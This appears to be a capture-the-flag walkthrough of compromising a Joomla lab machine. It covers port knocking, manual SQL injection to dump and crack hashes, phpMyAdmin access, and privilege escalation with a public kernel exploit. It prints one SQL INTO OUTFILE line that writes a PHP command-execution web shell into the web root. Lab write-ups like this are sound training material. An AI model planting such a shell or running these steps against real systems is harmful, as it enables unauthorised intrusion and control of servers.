As usual I started with netdiscover:
Next step was to scan ports:
In reality I spent a bit of time as port 80 did not reveal anything, port 666 was filtered. I used tool called knock-knock (https://github.com/pan0pt1c0n/knock-knock). After running it I saw port 666 as open. I examined source code of the page and it was shown as Joomla. I enumerated target more using metasploit module for Joomla plugins as it is quite often that plugins are vulnerable.
3. ExploitationI was right: sectionid was vulnerable to SQL injection. As a next step I entered quote to verify whether it was a true:
As a next step I reviewed Joomla documentation to understand in what table user hashes are stored. I did hands-on SQL Injection exploitation instead of using sqlmap. I revealed field that was suitable for data exfiltration, enumerated tables and etc. I used this request to extract information about users:
This gave me hashes:
I cracked hashes using Joomla_cracker.pl from https://gist.github.com/cobra-tn/2304218. Cracked hashes did not give me any new footpath. So I decided to utilize another SQLi option - retrieve files. By default Joomla configuration file located in web root. I assumed that /var/www was default path. After I retrieved file I tried "root" username and password to login in phpMyAdmin.
I was able to login. Then I spent some time to create limited shell. I used this video as an example: https://worldhack3r.wordpress.com/2013/05/06/upload-shell-in-phpmyadmin/. To tell long story short: I created database and table in MySQL. Then I used INTO OUTFILE MySQL command to create PHP shell in web root:
SELECT "<? system($REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/cmd.php"
Then I used this shell to create connection back to my machine using python.
4. Privilege escalationAfter quick enumeration I tried several kernel exploits. Machine was rooted using "RDS socket" exploit - https://www.exploit-db.com/exploits/15285/. I uploaded exploit code using wget to /tmp, compiled with default gcc and got root.
In general machine was not difficult, there were only few tricky moments to overcome:
1. port knocking - understand that it is in use and find ways to bypass
2. use SQL injection not only to dump hashes but also enumerate files on filesystem
3. shell in phpMyAdmin